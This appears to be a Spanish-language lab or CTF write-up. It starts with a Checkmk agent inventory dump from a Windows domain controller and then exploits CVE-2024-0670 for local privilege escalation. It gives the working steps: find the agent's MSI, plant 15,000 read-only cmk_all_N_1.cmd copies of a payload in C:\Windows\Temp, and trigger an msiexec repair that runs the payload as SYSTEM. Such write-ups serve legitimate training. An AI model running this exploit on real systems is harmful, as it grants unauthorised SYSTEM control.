-232 269127812500 267834375000 268481093750 100nsec_timer_inv
-96 16756093750 17038593750 16897343750 100nsec_timer
-94 7682187500 8691562500 8186875000 100nsec_timer
-90 7826738 8231768 16058506 counter
458 123750000 775000000 449375000 100nsec_timer
460 64843750 628750000 346796875 100nsec_timer
1096 772962 657102 1430064 counter
1098 0 0 0 rawcount
1508 266444050300 266901393959 266672722129 100nsec_timer
1510 266444050300 266901393959 266672722129 100nsec_timer
1512 0 0 0 100nsec_timer
1514 0 0 0 100nsec_timer
1516 4589477 4176547 8766024 bulk_count
1518 0 0 0 bulk_count
1520 0 0 0 bulk_count
<<<services>>>
ADWS running/auto Active Directory Web Services
AJRouter stopped/demand AllJoyn Router Service
ALG stopped/demand Application Layer Gateway Service
AppIDSvc stopped/demand Application Identity
Appinfo stopped/demand Application Information
AppMgmt stopped/demand Application Management
AppReadiness stopped/demand App Readiness
AppVClient stopped/disabled Microsoft App-V Client
AppXSvc stopped/demand AppX Deployment Service (AppXSVC)
AudioEndpointBuilder stopped/demand Windows Audio Endpoint Builder
Audiosrv stopped/demand Windows Audio
AxInstSV stopped/disabled ActiveX Installer (AxInstSV)
BFE running/auto Base Filtering Engine
BITS stopped/demand Background Intelligent Transfer Service
BrokerInfrastructure running/auto Background Tasks Infrastructure Service
bthserv stopped/demand Bluetooth Support Service
camsvc running/demand Capability Access Manager Service
CDPSvc running/auto Connected Devices Platform Service
CertPropSvc running/demand Certificate Propagation
CheckmkService running/auto Checkmk Service
ClipSVC stopped/demand Client License Service (ClipSVC)
COMSysApp running/demand COM+ System Application
CoreMessagingRegistrar running/auto CoreMessaging
CryptSvc running/auto Cryptographic Services
CscService stopped/disabled Offline Files
DcomLaunch running/auto DCOM Server Process Launcher
dcsvc stopped/demand Declared Configuration(DC) service
defragsvc stopped/demand Optimize drives
DeviceAssociationService stopped/demand Device Association Service
DeviceInstall stopped/demand Device Install Service
DevQueryBroker stopped/demand DevQuery Background Discovery Broker
Dfs running/auto DFS Namespace
DFSR running/auto DFS Replication
Dhcp running/auto DHCP Client
diagnosticshub.standardcollector.service stopped/demand Microsoft (R) Diagnostics Hub Standard Collector Service
DiagTrack running/auto Connected User Experiences and Telemetry
DispBrokerDesktopSvc running/auto Display Policy Service
DmEnrollmentSvc stopped/demand Device Management Enrollment Service
dmwappushservice stopped/disabled Device Management Wireless Application Protocol (WAP) Push message Routing Service
DNS running/auto DNS Server
Dnscache running/auto DNS Client
DoSvc stopped/demand Delivery Optimization
dot3svc stopped/demand Wired AutoConfig
DPS running/auto Diagnostic Policy Service
DsmSvc running/demand Device Setup Manager
DsRoleSvc stopped/demand DS Role Server
DsSvc running/demand Data Sharing Service
EapHost stopped/demand Extensible Authentication Protocol
edgeupdate stopped/auto Microsoft Edge Update Service (edgeupdate)
edgeupdatem stopped/demand Microsoft Edge Update Service (edgeupdatem)
EFS stopped/demand Encrypting File System (EFS)
embeddedmode stopped/demand Embedded Mode
EntAppSvc stopped/demand Enterprise App Management Service
EventLog running/auto Windows Event Log
EventSystem running/auto COM+ Event System
fdPHost stopped/demand Function Discovery Provider Host
FDResPub stopped/demand Function Discovery Resource Publication
FontCache running/auto Windows Font Cache Service
FrameServer stopped/demand Windows Camera Frame Server
FrameServerMonitor stopped/demand Windows Camera Frame Server Monitor
gpsvc running/auto Group Policy Client
GraphicsPerfSvc stopped/disabled GraphicsPerfSvc
hidserv stopped/demand Human Interface Device Service
HvHost stopped/demand HV Host Service
IKEEXT running/auto IKE and AuthIP IPsec Keying Modules
InstallService stopped/demand Microsoft Store Install Service
iphlpsvc running/auto IP Helper
IsmServ running/auto Intersite Messaging
Kdc running/auto Kerberos Key Distribution Center
KdsSvc stopped/demand Microsoft Key Distribution Service
KeyIso running/demand CNG Key Isolation
KPSSVC stopped/demand KDC Proxy Server service (KPS)
KtmRm stopped/demand KtmRm for Distributed Transaction Coordinator
LanmanServer running/auto Server
LanmanWorkstation running/auto Workstation
lfsvc stopped/disabled Geolocation Service
LicenseManager running/demand Windows License Manager Service
lltdsvc stopped/disabled Link-Layer Topology Discovery Mapper
lmhosts stopped/demand TCP/IP NetBIOS Helper
LSM running/auto Local Session Manager
MapsBroker stopped/disabled Downloaded Maps Manager
McpManagementService stopped/demand McpManagementService
MicrosoftEdgeElevationService stopped/demand Microsoft Edge Elevation Service (MicrosoftEdgeElevationService)
mpssvc running/auto Windows Defender Firewall
MSDTC running/auto Distributed Transaction Coordinator
MSiSCSI stopped/demand Microsoft iSCSI Initiator Service
msiserver stopped/demand Windows Installer
NcaSvc stopped/demand Network Connectivity Assistant
NcbService running/demand Network Connection Broker
Netlogon running/auto Netlogon
Netman stopped/demand Network Connections
netprofm running/demand Network List Service
NetSetupSvc stopped/demand Network Setup Service
NetTcpPortSharing stopped/disabled Net.Tcp Port Sharing Service
NgcCtnrSvc stopped/demand Microsoft Passport Container
NgcSvc stopped/demand Microsoft Passport
NlaSvc running/auto Network Location Awareness
nsi running/auto Network Store Interface Service
NTDS running/auto Active Directory Domain Services
NtFrs stopped/disabled File Replication
PcaSvc running/auto Program Compatibility Assistant Service
PerfHost stopped/demand Performance Counter DLL Host
pla stopped/demand Performance Logs & Alerts
PlugPlay running/demand Plug and Play
PolicyAgent running/demand IPsec Policy Agent
Power running/auto Power
PrintNotify stopped/demand Printer Extensions and Notifications
ProfSvc running/auto User Profile Service
PushToInstall stopped/disabled Windows PushToInstall Service
QWAVE stopped/demand Quality Windows Audio Video Experience
RasAuto stopped/demand Remote Access Auto Connection Manager
RasMan running/auto Remote Access Connection Manager
RemoteAccess stopped/disabled Routing and Remote Access
RemoteRegistry stopped/auto Remote Registry
RmSvc stopped/disabled Radio Management Service
RpcEptMapper running/auto RPC Endpoint Mapper
RpcLocator stopped/demand Remote Procedure Call (RPC) Locator
RpcSs running/auto Remote Procedure Call (RPC)
RSoPProv stopped/demand Resultant Set of Policy Provider
sacsvr stopped/demand Special Administration Console Helper
SamSs running/auto Security Accounts Manager
SCardSvr stopped/demand Smart Card
ScDeviceEnum stopped/disabled Smart Card Device Enumeration Service
Schedule running/auto Task Scheduler
SCPolicySvc stopped/demand Smart Card Removal Policy
seclogon running/demand Secondary Logon
SecurityHealthService stopped/demand Windows Security Service
SEMgrSvc stopped/disabled Payments and NFC/SE Manager
SENS running/auto System Event Notification Service
Sense stopped/demand Windows Defender Advanced Threat Protection Service
SensorDataService stopped/disabled Sensor Data Service
SensorService stopped/demand Sensor Service
SensrSvc stopped/demand Sensor Monitoring Service
SessionEnv running/demand Remote Desktop Configuration
SgrmBroker stopped/demand System Guard Runtime Monitor Broker
SharedAccess stopped/disabled Internet Connection Sharing (ICS)
ShellHWDetection running/auto Shell Hardware Detection
shpamsvc stopped/disabled Shared PC Account Manager
smphost stopped/demand Microsoft Storage Spaces SMP
SNMPTRAP stopped/demand SNMP Trap
Spooler stopped/disabled Print Spooler
sppsvc stopped/auto Software Protection
SSDPSRV stopped/disabled SSDP Discovery
ssh-agent stopped/disabled OpenSSH Authentication Agent
SstpSvc running/demand Secure Socket Tunneling Protocol Service
StateRepository running/auto State Repository Service
StiSvc stopped/demand Windows Image Acquisition (WIA)
StorSvc running/auto Storage Service
svsvc stopped/demand Spot Verifier
swprv stopped/demand Microsoft Software Shadow Copy Provider
SysMain running/auto SysMain
SystemEventsBroker running/auto System Events Broker
TabletInputService running/demand Touch Keyboard and Handwriting Panel Service
tapisrv running/demand Telephony
TermService running/demand Remote Desktop Services
Themes stopped/disabled Themes
TieringEngineService stopped/demand Storage Tiers Management
TimeBrokerSvc running/demand Time Broker
TokenBroker running/demand Web Account Manager
TrkWks stopped/demand Distributed Link Tracking Client
TrustedInstaller stopped/demand Windows Modules Installer
tzautoupdate stopped/disabled Auto Time Zone Updater
UALSVC running/auto User Access Logging Service
UevAgentService stopped/disabled User Experience Virtualization Service
UmRdpService running/demand Remote Desktop Services UserMode Port Redirector
upnphost stopped/disabled UPnP Device Host
UserManager running/auto User Manager
UsoSvc running/auto Update Orchestrator Service
VaultSvc stopped/demand Credential Manager
vds running/demand Virtual Disk
VGAuthService running/auto VMware Alias Manager and Ticket Service
vm3dservice running/auto VMware SVGA Helper Service
vmicguestinterface stopped/demand Hyper-V Guest Service Interface
vmicheartbeat stopped/demand Hyper-V Heartbeat Service
vmickvpexchange stopped/demand Hyper-V Data Exchange Service
vmicshutdown stopped/demand Hyper-V Guest Shutdown Service
vmictimesync stopped/demand Hyper-V Time Synchronization Service
vmicvmsession stopped/demand Hyper-V PowerShell Direct Service
vmicvss stopped/demand Hyper-V Volume Shadow Copy Requestor
VMTools running/auto VMware Tools
vmvss stopped/demand VMware Snapshot Provider
VSS stopped/demand Volume Shadow Copy
W32Time running/auto Windows Time
WaaSMedicSvc stopped/demand Windows Update Medic Service
WalletService stopped/disabled WalletService
WarpJITSvc stopped/demand Warp JIT Service
WbioSrvc stopped/demand Windows Biometric Service
Wcmsvc running/auto Windows Connection Manager
WdiServiceHost stopped/demand Diagnostic Service Host
WdiSystemHost stopped/demand Diagnostic System Host
WdNisSvc running/demand Microsoft Defender Antivirus Network Inspection Service
Wecsvc stopped/demand Windows Event Collector
WEPHOSTSVC stopped/demand Windows Encryption Provider Host Service
wercplsupport stopped/demand Problem Reports Control Panel Support
WerSvc stopped/demand Windows Error Reporting Service
WiaRpc stopped/demand Still Image Acquisition Events
WinDefend running/auto Microsoft Defender Antivirus Service
WinHttpAutoProxySvc running/demand WinHTTP Web Proxy Auto-Discovery Service
Winmgmt running/auto Windows Management Instrumentation
WinRM running/auto Windows Remote Management (WS-Management)
wisvc stopped/disabled Windows Insider Service
wlidsvc stopped/demand Microsoft Account Sign-in Assistant
wmiApSrv stopped/demand WMI Performance Adapter
WMPNetworkSvc stopped/demand Windows Media Player Network Sharing Service
WPDBusEnum stopped/demand Portable Device Enumerator Service
WpnService running/auto Windows Push Notifications System Service
WSearch stopped/disabled Windows Search
wuauserv stopped/demand Windows Update
CaptureService_1dab18 stopped/demand CaptureService_1dab18
cbdhsvc_1dab18 running/auto Clipboard User Service_1dab18
CDPUserSvc_1dab18 running/auto Connected Devices Platform User Service_1dab18
ConsentUxUserSvc_1dab18 stopped/demand ConsentUX User Service_1dab18
CredentialEnrollmentManagerUserSvc_1dab18 stopped/demand CredentialEnrollmentManagerUserSvc_1dab18
DeviceAssociationBrokerSvc_1dab18 stopped/demand DeviceAssociationBroker_1dab18
DevicePickerUserSvc_1dab18 stopped/disabled DevicePicker_1dab18
DevicesFlowUserSvc_1dab18 stopped/demand DevicesFlow_1dab18
PimIndexMaintenanceSvc_1dab18 stopped/demand Contact Data_1dab18
PrintWorkflowUserSvc_1dab18 stopped/demand PrintWorkflow_1dab18
UdkUserSvc_1dab18 stopped/demand Udk User Service_1dab18
UnistoreSvc_1dab18 stopped/demand User Data Storage_1dab18
UserDataSvc_1dab18 stopped/demand User Data Access_1dab18
WpnUserService_1dab18 running/auto Windows Push Notifications User Service_1dab18
<<<checkmk_agent_plugins_win:sep(0)>>>
pluginsdir C:\ProgramData\checkmk\agent\plugins
localdir C:\ProgramData\checkmk\agent\local
<<<logwatch>>>
[[[Active Directory Web Services]]]
[[[Application]]]
[[[DFS Replication]]]
[[[Directory Service]]]
[[[DNS Server]]]
[[[HardwareEvents]]]
[[[Internet Explorer]]]
[[[Key Management Service]]]
[[[Security]]]
[[[System]]]
W Nov 11 21:04:11 0.1014 Microsoft-Windows-DNS-Client One of the files in the registry database had to be recovered by use of a log or alternate copy. The recovery was successful.  
[[[Windows PowerShell:missing]]]
<<<ps:sep(9)>>>
(SYSTEM,0,8,0,0,0,0,536962187500,0,4,29352)	System Idle Process
(SYSTEM,0,144,0,4,0,0,869218750,2319,128,29352)	System
(SYSTEM,0,19480,0,100,1,0,35312500,0,4,29357)	Registry
(SYSTEM,0,1232,0,352,1,312500,2031250,60,2,29352)	smss.exe
(SYSTEM,0,6544,0,448,2,12656250,51875000,494,11,29348)	csrss.exe
(SYSTEM,0,6072,0,548,1,468750,1093750,176,10,29348)	csrss.exe
(SYSTEM,0,7168,0,556,1,312500,781250,151,1,29348)	wininit.exe
(\\NT AUTHORITY\SYSTEM,2844,14816,0,616,2,937500,2187500,222,2,29347)	winlogon.exe
(SYSTEM,0,14288,0,688,5,15156250,12500000,645,7,29347)	services.exe
(\\NT AUTHORITY\SYSTEM,58712,70108,0,704,57,953906250,446875000,2253,30,29347)	lsass.exe
(\\NT AUTHORITY\SYSTEM,7212,24124,0,904,7,5781250,8906250,1024,10,29344)	svchost.exe
(\\Font Driver Host\UMFD-0,1500,3900,0,928,1,625000,2343750,39,5,29344)	fontdrvhost.exe
(\\Font Driver Host\UMFD-1,1564,4016,0,936,1,156250,468750,39,5,29344)	fontdrvhost.exe
(\\NT AUTHORITY\NETWORK SERVICE,6404,13376,0,1008,6,48437500,28437500,939,9,29344)	svchost.exe
(\\NT AUTHORITY\SYSTEM,2884,11456,0,444,2,12187500,10000000,340,4,29344)	svchost.exe
(\\Window Manager\DWM-1,17408,43448,0,780,17,3281250,2343750,635,16,29344)	dwm.exe
(\\NT AUTHORITY\NETWORK SERVICE,10312,25736,0,1004,10,13906250,12500000,701,30,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,3136,7756,0,1056,3,937500,1875000,132,3,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,1804,12580,0,1064,1,156250,312500,177,2,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,1648,7552,0,1072,1,0,0,197,4,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1996,10208,0,1080,1,156250,625000,212,1,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,2204,8044,0,1148,2,3281250,3906250,225,5,29343)	svchost.exe
(\\NT AUTHORITY\NETWORK SERVICE,3468,10584,0,1212,3,32187500,43281250,301,11,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,14916,19816,0,1256,14,50156250,32031250,384,7,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,10904,21168,0,1364,10,8593750,5000000,429,12,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,3380,14360,0,1404,3,11093750,21875000,315,7,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,2840,12392,0,1412,2,16406250,43593750,216,5,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,2864,9416,0,1440,2,5000000,1250000,442,4,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,1432,6420,0,1496,1,156250,156250,150,2,29343)	svchost.exe
(\\NT AUTHORITY\NETWORK SERVICE,4160,13468,0,1560,4,468750,625000,394,4,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1900,8912,0,1576,1,156250,2656250,185,2,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,1968,9208,0,1664,1,156250,156250,291,3,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,5448,16108,0,1672,5,16406250,46406250,382,11,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,2104,13076,0,1712,2,312500,468750,198,2,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,1672,7096,0,1752,1,0,312500,166,5,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,1788,7932,0,1760,1,1093750,2812500,170,2,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1508,7600,0,1820,1,0,156250,162,2,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,3860,12068,0,1888,3,3125000,6718750,306,4,29343)	svchost.exe
(\\NT AUTHORITY\NETWORK SERVICE,2224,9860,0,1964,2,4531250,5156250,224,5,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,2816,11192,0,2020,2,4218750,3906250,435,4,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,2712,10888,0,2052,2,468750,2812500,363,5,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1468,7276,0,2064,1,0,312500,158,3,29343)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,1368,7512,0,2192,1,312500,0,126,1,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,2152,9872,0,2276,2,0,312500,226,4,29343)	svchost.exe
(\\NT AUTHORITY\SYSTEM,2484,9556,0,2556,2,2187500,2343750,207,5,29343)	svchost.exe
(\\NT AUTHORITY\NETWORK SERVICE,1884,7852,0,2712,1,4375000,625000,165,3,29342)	svchost.exe
(\\NT AUTHORITY\SYSTEM,2340,9488,0,3000,2,1875000,2031250,209,6,29334)	svchost.exe
(\\NT AUTHORITY\NETWORK SERVICE,4240,15376,0,2128,4,238750000,173593750,276,6,29334)	svchost.exe
(\\NT AUTHORITY\SYSTEM,58440,76552,0,2152,57,560937500,98125000,554,14,29334)	Microsoft.ActiveDirectory.WebServices.exe
(\\NT AUTHORITY\SYSTEM,13516,30616,0,1428,13,10156250,9843750,485,8,29334)	svchost.exe
(\\NT AUTHORITY\SYSTEM,7944,18764,0,2288,7,7187500,15156250,295,15,29334)	check_mk_agent.exe
(\\NT AUTHORITY\SYSTEM,17128,26020,0,2228,16,58437500,34062500,420,16,29334)	dfsrs.exe
(\\NT AUTHORITY\SYSTEM,2644,8728,0,2764,2,0,937500,271,4,29334)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1988,6700,0,2596,1,0,0,160,7,29334)	ismserv.exe
(\\NT AUTHORITY\SYSTEM,69216,71304,0,2520,67,6406250,4062500,5396,16,29334)	dns.exe
(\\NT AUTHORITY\LOCAL SERVICE,1648,7428,0,2856,1,0,312500,155,1,29334)	svchost.exe
(\\NT AUTHORITY\SYSTEM,5404,13684,0,2600,5,19062500,5937500,157,3,29334)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1548,7068,0,1900,1,0,468750,139,2,29334)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1892,6396,0,3076,1,312500,0,156,11,29334)	dfssvc.exe
(\\NT AUTHORITY\SYSTEM,1572,6792,0,3132,1,156250,0,128,3,29334)	vm3dservice.exe
(\\NT AUTHORITY\SYSTEM,10924,24776,0,3148,10,15156250,14218750,406,13,29334)	vmtoolsd.exe
(\\NT AUTHORITY\SYSTEM,2480,11028,0,3156,2,0,156250,167,2,29334)	VGAuthService.exe
(\\NT AUTHORITY\SYSTEM,11232,21244,0,3176,10,262968750,131718750,448,22,29334)	svchost.exe
(SYSTEM,0,226144,0,3192,185,5933437500,3702968750,645,23,29334)	MsMpEng.exe
(\\NT AUTHORITY\NETWORK SERVICE,3236,13952,0,3232,3,937500,937500,272,5,29334)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1516,12084,0,3240,1,0,156250,140,1,29334)	svchost.exe
(\\NT AUTHORITY\NETWORK SERVICE,2320,9328,0,3348,2,0,156250,247,7,29334)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1692,7076,0,3504,1,156250,2031250,134,4,29334)	vm3dservice.exe
(\\NT AUTHORITY\SYSTEM,2440,11604,0,3864,2,312500,625000,209,11,29333)	vds.exe
(\\NT AUTHORITY\SYSTEM,2116,8488,0,3884,2,0,0,137,7,29333)	cmk-agent-ctl.exe
(\\NT AUTHORITY\SYSTEM,1476,6660,0,3696,1,1250000,625000,114,2,29333)	AggregatorHost.exe
(\\NT AUTHORITY\SYSTEM,3840,14696,0,3484,3,2187500,1093750,279,10,29333)	dllhost.exe
(\\NT AUTHORITY\NETWORK SERVICE,2896,11140,0,4228,2,468750,625000,238,9,29332)	msdtc.exe
(\\NT AUTHORITY\NETWORK SERVICE,11864,24084,0,4252,11,206718750,182187500,414,9,29332)	WmiPrvSE.exe
(\\NT AUTHORITY\SYSTEM,2372,4028,0,4484,2,468750,468750,220,3,29332)	MicrosoftEdgeUpdate.exe
(SYSTEM,0,10976,0,4004,3,312500,468750,210,4,29328)	NisSrv.exe
(\\NT AUTHORITY\SYSTEM,3580,14244,0,2960,3,156250,625000,403,12,29306)	svchost.exe
(\\NT AUTHORITY\SYSTEM,11424,45656,0,5260,11,1875000,6875000,463,9,29305)	LogonUI.exe
(\\NT AUTHORITY\SYSTEM,4040,18604,0,5960,3,25312500,60156250,317,1,29302)	svchost.exe
(\\NANOCORP\web_svc,10096,1724,0,5040,9,2031250,1875000,172,1,29242)	httpd.exe
(\\NANOCORP\web_svc,6560,728,0,5012,6,625000,1093750,140,4,29242)	conhost.exe
(\\NANOCORP\web_svc,17660,3064,0,5440,17,1406250,2343750,481,153,29240)	httpd.exe
(\\NT AUTHORITY\LOCAL SERVICE,2744,13636,0,5768,2,156250,625000,237,4,29186)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,17228,20240,0,2916,16,21093750,107031250,303,22,29186)	svchost.exe
(\\NT AUTHORITY\SYSTEM,4064,11876,0,5456,3,156250,3750000,259,6,29185)	svchost.exe
(\\NT AUTHORITY\SYSTEM,7988,15728,0,1868,7,1093750,2031250,268,8,29185)	svchost.exe
(\\NT AUTHORITY\SYSTEM,2896,12460,0,660,2,625000,625000,239,10,29183)	svchost.exe
(\\NT AUTHORITY\SYSTEM,6176,10892,0,760,6,0,312500,193,4,28731)	svchost.exe
(SYSTEM,0,6704,0,3276,1,2812500,8281250,243,8,28664)	csrss.exe
(\\NT AUTHORITY\SYSTEM,2416,11092,0,1284,2,625000,3125000,253,2,28664)	winlogon.exe
(\\Font Driver Host\UMFD-2,1624,4416,0,4968,1,468750,2187500,39,5,28661)	fontdrvhost.exe
(\\Window Manager\DWM-2,11464,38460,0,4128,11,20781250,15937500,710,17,28661)	dwm.exe
(\\NANOCORP\web_svc,2300,11428,0,1128,2,2812500,4843750,303,6,28658)	rdpclip.exe
(\\NANOCORP\web_svc,4936,26792,0,1280,4,3281250,2031250,495,7,28658)	sihost.exe
(\\NANOCORP\web_svc,2772,13416,0,3724,2,781250,2812500,220,3,28658)	svchost.exe
(\\NANOCORP\web_svc,5136,26400,0,2212,5,1406250,781250,326,2,28658)	svchost.exe
(\\NANOCORP\web_svc,2312,12040,0,2308,2,156250,468750,185,2,28657)	taskhostw.exe
(\\NT AUTHORITY\SYSTEM,2888,15380,0,2812,2,3593750,625000,225,2,28657)	svchost.exe
(\\NT AUTHORITY\SYSTEM,1576,7872,0,4936,1,156250,2343750,173,3,28657)	svchost.exe
(\\NANOCORP\web_svc,3268,15260,0,6212,3,312500,937500,366,8,28657)	ctfmon.exe
(\\NT AUTHORITY\SYSTEM,2008,11064,0,6372,1,312500,781250,166,1,28657)	svchost.exe
(\\NANOCORP\web_svc,27664,92156,0,6620,27,56875000,78437500,1576,34,28656)	explorer.exe
(\\NANOCORP\web_svc,12576,53956,0,7040,12,2500000,2343750,569,10,28652)	StartMenuExperienceHost.exe
(\\NANOCORP\web_svc,10016,43164,0,7080,9,1875000,1562500,544,8,28651)	TextInputHost.exe
(\\NANOCORP\web_svc,2636,16332,0,6056,2,156250,625000,192,1,28651)	RuntimeBroker.exe
(\\NANOCORP\web_svc,31896,66860,0,5544,31,18906250,11406250,670,15,28650)	SearchApp.exe
(\\NANOCORP\web_svc,20272,39004,0,6696,19,7187500,11250000,321,1,28648)	RuntimeBroker.exe
(\\NANOCORP\web_svc,2280,13280,0,7224,2,781250,1250000,225,1,28646)	RuntimeBroker.exe
(\\NT AUTHORITY\SYSTEM,7888,31016,0,7716,7,937500,2812500,355,5,28638)	LogonUI.exe
(\\NANOCORP\web_svc,3132,12504,0,8108,3,0,156250,203,1,28635)	AzureArcSysTray.exe
(\\NANOCORP\web_svc,2260,14528,0,3480,2,156250,156250,171,2,28538)	svchost.exe
(\\NT AUTHORITY\LOCAL SERVICE,2412,14680,0,7748,2,156250,312500,178,2,22103)	svchost.exe
(\\NANOCORP\monitoring_svc,69644,95052,0,6296,68,16562500,6250000,1325,13,2703)	wsmprovhost.exe
(\\NT AUTHORITY\SYSTEM,1272,6288,0,4620,1,312500,0,120,2,2547)	svchost.exe
(\\NANOCORP\web_svc,116868,129384,0,6900,114,48750000,19687500,765,14,2546)	powershell.exe
(\\NANOCORP\web_svc,2660,6800,0,7972,2,1250000,10312500,86,2,2546)	conhost.exe
<<<>>>
<<<>>>
<<<systemtime>>>
1762926156

Privesc via CVE-2024-0670

Encontramos que existe la vulnerabilidad Local Privilege Escalation via writable files (CVE-2024-0670). Esta vulnerabilidad toma ventaja de un archivo temporal que CheckMK ejecuta tras realizar la reparacion de este. El nombre del archivo que ejecuta incluyen numeros que pueden ser “predecidos” (cmk_all_{}_{}.cmd) por lo que es posible agregar comandos que se ejecutarian como administrador.

Para explotar la vulnerabilidad inicialmente se necesita acceso a C:\Windows\Temp, para este caso web_svc tiene acceso.

PS C:\Windows\system32> icacls C:/windows/temp
C:/windows/temp BUILTIN\Users:(CI)(S,WD,AD,X)
                BUILTIN\Administrators:(F)
                BUILTIN\Administrators:(OI)(CI)(IO)(F)
                NT AUTHORITY\SYSTEM:(F)
                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                CREATOR OWNER:(OI)(CI)(IO)(F)
                NANOCORP\web_svc:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
PS C:\Windows\system32>

Luego, identificamos cual archivo .msi pertenece a Check MK en C:\Windows\Installer\, vemos que es 1e6f2.msi.

PS C:\ProgramData\checkmk\agent> $inst = New-Object -ComObject WindowsInstaller.Installer; Get-ChildItem C:\Windows\Installer\*.msi | ForEach-Object { try { $db=$inst.OpenDatabase($_.FullName,0); $v=$db.OpenView("SELECT `Value` FROM `Property` WHERE `Property`='ProductName'"); $v.Execute(); $r=$v.Fetch(); $name = if ($r) { $r.StringData(1) } else { '' }; [PSCustomObject]@{File=$_.Name; ProductName=$name} } catch { [PSCustomObject]@{File=$_.Name; ProductName='<err>'} } } | Format-Table -AutoSize

File      ProductName                                                   
----      -----------                                                   
1e6f2.msi Check MK Agent 2.1                                            
387c2.msi Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532   
387c6.msi Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532
387ca.msi Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532   
387ce.msi Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532
387d1.msi VMware Tools                                                  


PS C:\ProgramData\checkmk\agent>

Tras ejecutar el archivo 1e6f2.msi observamos que se crea el archivo cmk_all_6440_1.cmd, esto nos indica que el rango del numero en el nombre es entre 1-10000.

PS C:\ProgramData\checkmk\agent> msiexec.exe /fa C:\Windows\Installer\1e6f2.msi
PS C:\ProgramData\checkmk\agent> dir C:\Windows\Temp\


    Directory: C:\Windows\Temp


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         11/3/2025   5:05 PM                vmware-SYSTEM                                                        
-a----        11/11/2025   1:35 PM             53 af397ef28e484961ba48646a5d38cf54.db.ses                              
-a----        11/11/2025  10:05 PM           1069 cmk_all_6440_1.cmd                                                   
-a----        11/11/2025  10:05 PM            423 cmk_data_6440_2.cmd                                                  
-a----        11/11/2025   1:35 PM              0 mat-debug-6036.log                                                   
-a----        11/11/2025   9:34 PM          35532 MpCmdRun.log                                                         
-a----        11/11/2025   1:34 PM            102 silconfig.log                                                        
-a----         11/4/2025   3:20 PM         189079 vmware-vmsvc-SYSTEM.log                                              
-a----         11/4/2025   3:18 PM          16602 vmware-vmtoolsd-Administrator.log                                    
-a----        11/11/2025   1:33 PM          20998 vmware-vmtoolsd-SYSTEM.log                                           
-a----        11/11/2025   1:45 PM           4891 vmware-vmtoolsd-web_svc.log                                          
-a----         11/4/2025   3:20 PM          66145 vmware-vmusr-Administrator.log                                       
-a----        11/11/2025   1:45 PM           5980 vmware-vmusr-web_svc.log                                             
-a----        11/11/2025   1:33 PM          20132 vmware-vmvss-SYSTEM.log                                              
-a----        11/11/2025  10:05 PM          81920 ~DF66B9E47727DB3BEA.TMP                                              


PS C:\ProgramData\checkmk\agent>

Ademas el contenido son comandos que eliminan o dan permisos a ciertos directorios.

PS C:\ProgramData\checkmk\agent> cat C:\Windows\Temp\cmk_all_6440_1.cmd
icacls "C:\ProgramData\checkmk" /inheritance:d /c
# [... cut ...]
icacls "C:\ProgramData\checkmk\agent\update" /remove:g *S-1-5-32-545 /c
PS C:\ProgramData\checkmk\agent>

Test whoami

Creamos un archivo que contiene la ejecucion de whoami.

1
2
3

PS C:\Windows\Temp> cat payload.cmd
whoami > C:\Windows\Temp\whoami.txt
PS C:\Windows\Temp>

Creamos una copia de nuestro archivo con nombre en el rango de numeros mencionado a traves de un foreach.

`1`	`1..15000 \| foreach { copy C:\Windows\Temp\payload.cmd C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;}`

Ejecutamos el foreach y luego el archivo .msi. Observamos que el comando fue ejecutado como system.

PS C:\Windows\Temp> 1..15000 | foreach { copy C:\Windows\Temp\payload.cmd C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;}
PS C:\Windows\Temp> msiexec.exe /fa C:\Windows\Installer\1e6f2.msi
PS C:\Windows\Temp> dir C:\Windows\Temp\ |findstr /v cmk*


    Directory: C:\Windows\Temp


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         11/3/2025   5:05 PM                vmware-SYSTEM                                                        
-a----        11/11/2025   1:35 PM             53 af397ef28e484961ba48646a5d38cf54.db.ses                              
-a----        11/11/2025   1:35 PM              0 mat-debug-6036.log                                                   
-a----        11/11/2025   9:34 PM          35532 MpCmdRun.log                                                         
-a----        11/11/2025   1:34 PM            102 silconfig.log                                                        
